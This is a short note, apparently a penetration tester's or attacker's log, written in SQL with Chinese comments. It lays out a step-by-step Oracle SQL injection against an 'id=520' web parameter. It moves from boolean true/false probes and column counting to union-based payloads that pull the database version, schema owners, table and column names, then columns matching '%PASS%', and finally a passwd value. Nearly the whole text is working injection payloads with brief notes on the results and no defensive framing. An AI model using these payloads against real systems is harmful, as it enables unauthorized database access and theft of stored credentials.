id=520 and 1=1 正常
id=520 and 1=2 出错

id=520 and ''||'1'='1' 返回正常
id=520 and ''||'2'='1' 返回无记录

id=520 order by 3 --  正常

id=520 order by 18 --正常

id=520 union 1=2 select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--

id=520 union 1=2 select 1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--  正常，说明第一个字段是数字型，接着
id=520 union 1=2 select 1,2,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--

id=520 union 1=2 select 1,'2',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--

id=520 and 1=2 union select 1, '2 ', '3 ', '4', '5','6',7,8,9, '10',NULL,NULL,NULL,14,'15','16','17','18' from dual--

id=520 and 1=2 union select 1, '2 ', '3 ', '4', (select banner from sys.v_\$version where rownum=1),'6',7,8,9, '10',NULL,NULL,NULL,14,'15','16','17','18' from dual--

(select owner from all_tables where owner<>'SYS' and rownum=1)

(select owner from all_tables where owner<>'SYS' and owner<>'AAAA' and rownum=1)

(select data from (select rownum as limit,owner as data from sys.all_tables) where limit =9)

(select data from (select rownum as limit,owner as data from sys.all_tables) where limit =100)

(select TABLE_NAME from all_tables where owner='AAAA'and rownum=1)
AAAA库中第一个表名，a1111
(select TABLE_NAME from all_tables where owner='AAAA'and TABLE_NAME<>'a1111' and rownum=1)

(select data from (select rownum as limit,TABLE_NAME as data from sys.all_tables where owner='AAAA') where limit =1)

(select data from (select rownum as limit,TABLE_NAME as data from sys.all_tables where owner='AAAA') where limit =2)

(select * from user_tab_columns where table_name='a1111' and rownum=1)

(select * from user_tab_columns where table_name='a1111' and COLUMN_NAME<>'1111a' and rownum=1)

(select data from (select rownum as limit,column_name as data from all_tab_columns where table_name='a1111') where limit =1)

(select owner||chr(35)||table_name||chr(35)||column_name from all_tab_columns where column_name like '%PASS%' and ROWNUM=1)

(select passwd from a5555 where rownum=1)